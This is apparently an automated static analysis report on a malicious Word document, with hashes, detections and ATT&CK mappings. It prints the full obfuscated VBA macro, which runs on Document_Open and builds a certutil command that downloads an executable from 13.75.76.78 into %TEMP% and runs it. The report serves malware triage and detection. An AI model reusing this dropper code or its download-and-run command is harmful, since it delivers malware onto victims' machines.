Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 93ba0d6b33b67267…

MALICIOUS

Office (OOXML)

Size: 155.4 KB
Created: 2019-07-26 19:51:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-11-20
MD5: 1a7d3e7ed1fab2cec38b5abff85d04d4
SHA-1: da5e1f9ba600b423de069db267ac3257546feee7
SHA-256: 93ba0d6b33b67267a4fc076cb632de12dffc92914adfc4e406a1a0826dec8a27
Risk Score: 290

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File

The sample is an OOXML document containing a VBA macro that executes automatically when the document is opened. The macro calls the Shell() function and references cmd.exe, which indicates an intent to download and execute a secondary payload. A Document_Open macro combined with a Shell() call is a strong indicator of dropper or downloader malware.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-7083808-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7083808-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    k = "W"
    k = Shell(StFmCsaKO, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1))
    End Sub
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
            On Error Resume Next
            Set cpJwuFpoD = GetObject(, "Word.Application")
            If Not cpJwuFpoD Is Nothing Then
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    vzurddc = "cmd.exe /c" & "CmD kmzmmfq" & " cmd " & "/c" & _
    "ce" & _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Call ewqgqybweryqghd
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://13.75.76.78/andd/Host_outputF07F1DF.exe: In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13299 bytes
SHA-256: 77d7c12aa4e52a5363c9821fd6e27335366dcb6061e5059e81af3ac9c8972a14
Detection
ClamAV: No threats found
Obfuscation or payload: likely
140 of 200 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Document_Open()
Call ewqgqybweryqghd
End Sub

Private Sub ewqgqybweryqghd()

Dim s34 As Object



If 88.2 = 22.2 Then
Else

End If
If 9 = 8 Then

Else


Dim mndmqdvqgfnbc As String
mndmqdvqgfnbc = "erYbnlZE.UOfImlcj"


Dim bbppgbniuxjjys

Application.Run bucvxatybaxwuvrp & mndmqdvqgfnbc & rxzp & trnfcjzm

End If





End Sub




Attribute VB_Name = "erYbnlZE"
#If VBA7 Then


#Else


#End If

#If VBA7 Then
Private Declare PtrSafe Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const hvdlurxavndib = 82204

#Else
Private Declare Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If


#If VBA7 Then
Const byony = 370
Private Declare PtrSafe Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If



#If VBA7 Then
Private Declare PtrSafe Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const ctwbbbzcand = 5
#Else
Private Declare Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function dtxynxxhrfl Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function ijjo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const rnlyxbgvoofcwhr = 86

Private Declare Function djc Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function xmqcdears Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function dtxynxxhrfl Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If

Private Type kvdcjmiicvywuywp
     qggt As Long
End Type


#If VBA7 Then


#Else


#End If
#If VBA7 Then


#Else


#End If

#If VBA7 Then
Private Declare PtrSafe Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const zgzy = 4047923

#Else
Private Declare Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If


#If VBA7 Then
Const qhy = 96
Private Declare PtrSafe Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If



#If VBA7 Then
Private Declare PtrSafe Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const hbltuxsemxvfve = 1
#Else
Private Declare Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function ogwlbet Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare Function kzxg Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const sihp = 10

Private Declare Function sqjdkelttrjcl Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function ofwkspopzflxk Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function ogwlbet Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If

Private Type kuyvlkniu
     ibwqueakxygbv As Long
End Type


#If VBA7 Then


#Else


#End If




Public Sub UOfImlcj()

On Error Resume Next




 
    'obgtjgowfezhueyr802ÙÇ©ÆÍ�¸®ã­
'ÜÓ±½â�Ŧ֪?ÖÓ´Èݥéã?¤¦?





 Dim fezhueyr As Integer

  
      
        

'jiukmfkdmmhlkocwxwbzurgq91
'9898





   Dim obgtjgow(317) As String
        obgtjgow(3) = "ÜÓ±½â�Ŧ֪?"
        obgtjgow(5) = "ÖÓ´Èݥéã?¤¦?"
        obgtjgow(1) = "ÙÇ©ÆÍ�¸®ã­"
        obgtjgow(6) = CStr(98)


'mcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'huzwubclbnpzztuebbhyidmkjftpndwymiwqsprwyikxbsygnn
'xcatpqhkedjirjfthquancmxav

   Dim vzcrnewdjr As Variant



'kocwxwbzurgqfezhueyr91
'physuwblvg802
'ttrpbrqycdczlarphysuwblvg4232






 Do Until 4503 = 4503
              Dim huzwubclb As Object
      Randomize
        Loop





        
'802jiukmfkdmmhl
'898
'91fezhueyr
        
        
             If toyvgyg = "ãÖÀÀÏ�¼»Þ??" Then
            Dim tef
            
            toyvgyg = 4071186761114#
        End If
        
        
'brryaisesvmvlkhquancmxavmcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'uczntaqbrrwyikxbsygnnpndwymiwqsprwyikxbsygnn



'wifzydvrbmcsiqnxhcwmogzlicmocnvcnhnpzztuebbhyidmk
'pndwymiwqsprwyikxbsygnnpndwymiwqsprwyikxbsygnn
'hquancmxavuczntaqbrrwyikxbsygnn


    Select Case 37
            Case Else
        End Select




'jiukmfkdmmhl
'tefphysuwblvg#Q14
'toyvgyg
'4232physuwblvg



        
        Dim akomhxtxmqvo, brwyikxbsygnn, czyhglqygod
For akomhxtxmqvo = 802 To 802 Step -1
czyhglqygod = 98
        Next akomhxtxmqvo
        

         Dim aryxmwwhhvnlwm As String


        'komhxtxmqvojftjftrwyikxbsygnnhquancmxav
'rwyikxbsygnnhquancmxavmcsiqnxhcwmogzlpndwymiwqsprwyikxbsygnn
'zyhglqygodrwyikxbsygnnrwyikxbsygnnhquancmxav
'npzztuebbhyidmkmcsiqnxhcwmogzlbrryaisesvmvlkhquancmxav
'jftmcsiqnxhcwmogzluczntaqbrrwyikxbsygnn



        
        If IsDate(qdbkwpqnvxz) And ((8 + 802) / (4232 + 374369518)) <> 162384288395110# Then
          wlb = "hjqag" & CStr("unuunwwbutw")
End If
        





'mywvdwycjftbrryaisesvmvlkhquancmxav
'icmocnvcnhnpzztuebbhyidmkbrryaisesvmvlkhquancmxav
'ÙÇ©ÆÍ�¸®ã­Q14
'ÖÓ´Èݥéã?¤¦?Q11

 
    'sdcypwcfnwzqpwlzioo73921134ëÕ¨ËѤƼé®
'ÚשÎß�¿ÞÖ¸Ê





 Dim ioo As Integer

  
      
        

'ojlomawbtymo35165612
'2121





   Dim sdcypwcfnwzqpwlz(444) As String
        sdcypwcfnwzqpwlz(7) = "ÚשÎß�¿"
        sdcypwcfnwzqpwlz(5) = "ÞÖ¸Ê"
        sdcypwcfnwzqpwlz(4) = "ëÕ¨ËѤƼé®"
        sdcypwcfnwzqpwlz(4) = CStr(21)


'lgcdppnjxvesnjmmcmpavbfsemx
'egyiswtzlehbvfxxqnsazndbclmppnjxvesnjmmcmpavbfsemx
'jgcmgtnlximaaysazndbclmixctlkegikai

   Dim bxyapoajyjw As Variant



'omawbtymoioo35165612
'sfnxcptgvlezxmvg73921134
'nuxaexibgvxyldcsfnxcptgvlezxmvg65282






 Do Until 1182 = 1182
              Dim egyiswtzlehb As Object
      Randomize
        Loop





        
'73921134ojl
'136794321
'35165612ioo
        
        
             If uuyouhtsoshdoxn = "âľÉÍ" Then
            Dim gdg
            
            uuyouhtsoshdoxn = 93499963983#
        End If
        
        
'diqsixctlkegikailgcdppnjxvesnjmmcmpavbfsemx
'cwftpamgypavbfsemxppnjxvesnjmmcmpavbfsemx



'spdahaklclgcdcwlgnadzynenfvfxxqn
'ppnjxvesnjmmcmpavbfsemxppnjxvesnjmmcmpavbfsemx
'ixctlkegikaicwftpamgypavbfsemx


    Select Case 40
            Case Else
        End Select




'ojl
'gdgsfnxcptgvlezxmvg#Q14
'uuyouhtsoshdoxn
'65282sfnxcptgvlezxmvg



        
        Dim adiyh, bpavbfsemx, ckfs
For adiyh = 73921134 To 73921134 Step -1
ckfs = 21
        Next adiyh
        

         Dim drhdbarmcmqhnemh As String


        'diyhsazndbclmsazndbclmpavbfsemxixctlkegikai
'pavbfsemxixctlkegikailgcdppnjxvesnjmmcmpavbfsemx
'kfspavbfsemxpavbfsemxixctlkegikai
'vfxxqnlgcddiqsixctlkegikai
'sazndbclmlgcdcwftpamgypavbfsemx



        
        If IsDate(wpsavvjh) And ((1367943 + 73921134) / (65282 + 7321042)) <> 3937242557207# Then
          nurmv = "zbudto" & CStr("lpriufnalxwfve")
End If
        





'cnnobwhnvvxsazndbclmdiqsixctlkegikai
'cwlgnadzynenfvfxxqndiqsixctlkegikai
'ëÕ¨ËѤƼé®Q14
'ÞÖ¸ÊQ11





If "DiUdvYYkaXFlJStAUnlrdpbLm" = "YBbYhDxeMgaOgBUysdJrVrLP" Then
gRiANHJrTzXJCpBn = "FNaFHkXewyBuGgqLHBmOeyZQXM"
wp = "oHDqlypMZgLWQIHwNThxuoOYAGnJhujaoGKu"
QurWucFDHiQJbzhPsvAsfpeKfeexkhKyNFxY = 6.22257731574995E+33
End If





Do Until "bZbbQeJFnxrREAVXsLyLtZJRbOh" <> "CNtMxLwcALjJaYGfKgCjTclsBSmCPKABxNDZDeTt"
sXhb = "lUTeGuMxcZbBKfZuMpKhLNVgbfNJgbFEQMg"
jlDFpAldxBUnTJfi = 373456919159794#
udYymCahDQAUXlxzHLbl = "sLbrj"
LZpXvWhVjHTxicYljkJZQW = 28934
MyEwRBSwHCdPINtFxqPOroNsIgGbriJJokd = "raPTQLMuFNQXqeMjAHxXkL"
lvrEYtUaXkUOWavygcTnvQikNVZIhmFpf = 3.23840053692693E+29
eYYGnAkmsnVQpJEJRvQXrVMGrDULtlefi = 6.81339610724978E+20
vXZZpTCJXuPwgPEXUKYIvJMSOjgZtG = 2.9383642571979E+42
qiGOhkrFx = "ixRrvWFHVQTGanmKHL"
mdPQlY = "aAXndEbnMLuaT"
bRXqpjIScWdg = 4.00053506930871E+25
bZbbQeJFnxrREAVXsLyLtZJRbOh = CNtMxLwcALjJaYGfKgCjTclsBSmCPKABxNDZDeTt
Loop








Do While 654 < 2
   Select Case mrjbvyvrrtenqmi
            Case "éзÀà�´¦í?¡??¦É¬", "ÓȾÆÞ?Ĺ֣??", "ßźÂà?®´á?"
               zxcbnmmf1 = "àÄ®ÁÝ¥µ¦Ö£???¿"
            Case "ÛÚ©", "àʨÎÔ¥ºµÙ?�?¥"
               zxcbnmmf2 = "ØÓºÔ"
            Case "ÛÖ¿¾Ð?»«ë®¡", "ÝϧÏÖ?³"
                zxcbnmmf3 = "ìȵÐ"
            Case Else
               zxcbnmmf4 = "soaixylctbkejfr"
    End Select

Exit Do
Randomize
Loop



Dim jepemzlaqkbwp As String
Dim xuhbj As Integer


xuhbj = 4364
jepemzlaqkbwp = "3RLivxKEmgZ2X1Fi"





Do While 847 < 7
   Select Case oveebpdbvzlgoat
            Case "à̬ÈÖ?Æ©ç¢", "ÛÖÀÇÍ?", "âöÁÒ£¹"
               zxcbnmmf1 = "ëÌ­½Ê?Ʀæ??"
            Case "ÜÙ¹¿â¤¯¬", "éÖ«Èѣ¥è§?"
               zxcbnmmf2 = "äÛ´Åß?º¥"
            Case "ÞÒ»ÈÝ?°²", "ÕʸÂÒ?Á¹Ø©??"
                zxcbnmmf3 = "ÓмÏÞ?"
            Case Else
               zxcbnmmf4 = "qfuifr"
    End Select

Exit Do
Randomize
Loop



Dim nyzsktufmsu As String
Dim xghe As Integer


xghe = 4364
nyzsktufmsu = "3RLivxKEmgZ2X1Fi"








If 9324.234 + 2345.23 = 23566.2 Then

Else

lop = "tes098ll65435467889654356786543535353534534553453543535354ce1"
lop = Right(Left(lop, 8), 0.005 * 101)
lop1 = "tes098ce65435467889654356786543535353534534553453543535354ce1"
'lop = lop + Right(Left(lop1, 8), 0.005 * 200)

pol = Mid("sd98567879865432234567899765432gdc8e9895", 0.004 * 49911)
pol = lop



End If


a = Left("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", 1)
'Right function
b = Right("HwyyoFecUo ntGkwuWwA IbQXiLuOzH", 1)


f = Right("HwyyoFecUo ntGkwuWwA IbQXiLuOzT", 1)

'Mid function
c = Mid("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", 1, 11)
'Split function
d = Split("EwyyoFecUo ntGkwuWwA IbQXiLuOzt", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next


vzurddc = "cmd.exe /c" & "CmD kmzmmfq" & " cmd " & "/c" & _
"ce" & _
"rtuti" & pol & _
" " & _
"-urlcache" & _
" " & _
"-split" & _
" " & _
"-f" & _
" " & _
"http://13.75.76.78/andd/Host_outputF07F1DF.exe" & _
" " & _
"%TEMP%\mqvaboxkcrj.pif" & _
"&" & _
" " & _
"%TEMP%\mqvaboxkcrj.pif"



zmeqzvkwmnyx (vzurddc)




Do Until "ECsUXYhtlZxlwpJRPUMPNTIcQlsatOdxUizZp" <> "oEBBpgIqSBhjPsU"
eluQ = 1.08325364430548E+19
lgHA = "vAQOpjbygHNMdbTaTrsJy"
dRDOfZNCYtASkIZDLxHQLNpRHSwdRoP = "ZLWzKbECkeiULLqKAPguChZQclHMckkkeKtZ"
ECsUXYhtlZxlwpJRPUMPNTIcQlsatOdxUizZp = oEBBpgIqSBhjPsU
Loop

 While "dMhLjRyFwxOVLroCTSXj" = "LmiMZQdgtCkwD"
kPEcABZdSrpIFCfdvvyIRZzyKBVYDveZIzEmO = "XinhTqXRLaAPGpxuZKQGRyfBZXNQzFytPFX"
VkFIbtquXooobOZ = "WIXZCmHwdGRFcHzBRgZpFHeYHkdliYolfEWGiy"
icIfUbkSPpnWu = "koPeyRRIWNESfaXlsSTTqMwbJxXSNwvBtwu"
GcjgvZGvbCvKuew = "DbyXrnUBuzuaRCYifH"
PinXQGBAHBMYjzaySyWYTIimwf = 6.7326294951552E+28
dYdMemzglPDiRqnMAhbLarDGkIiL = 4.23992557355971E+17
ABblZXb = 308547930842765#
Wend




EkeQQxZa

End Sub




Private Sub EkeQQxZa()
   Dim cpJwuFpoD As Object

    Do
        On Error Resume Next
        Set cpJwuFpoD = GetObject(, "Word.Application")
        If Not cpJwuFpoD Is Nothing Then
            cpJwuFpoD.Quit
            Set cpJwuFpoD = Nothing
        End If
    Loop Until cpJwuFpoD Is Nothing

End Sub







Sub zmeqzvkwmnyx(StFmCsaKO As String)
While "wMdIKSkVAhsxAH" = "obHtnbgiOMbDU"
bZdwYIHwoqxFGVEEHBhihQVQjoPePwiPQbZHOA = 8.88143014062935E+30
yGrmQvhULeJFZVlMKENNksdh = "HipewwqGZicpeEUBTEzFrItePOCBnrGcKuJNr"
OhTyAmJXgAtMQodbByoLPiuoShczekvGJdqR = "sIHVrhCHbbRyjtKZgagnefTKJswFmCnx"
pIqhqXArgrG = 6.11922130360933E+20
Wend
k = "W"
k = Shell(StFmCsaKO, Left(Left(Mid("ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch626463965223507171466558669015372347853185123047524556333900563576839593172803245215818260", 50), 1), 1))
End Sub

vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 37888 bytes
SHA-256: 0e289b33430de45c0cef680ce4b213b40b29ee1bb03be350aecdcacdb414c9dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
322 of 489 identifiers look randomly generated (e.g. 'ingfbbamkodhqcwtpzhbcpxqaaigdjmoadch6264') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).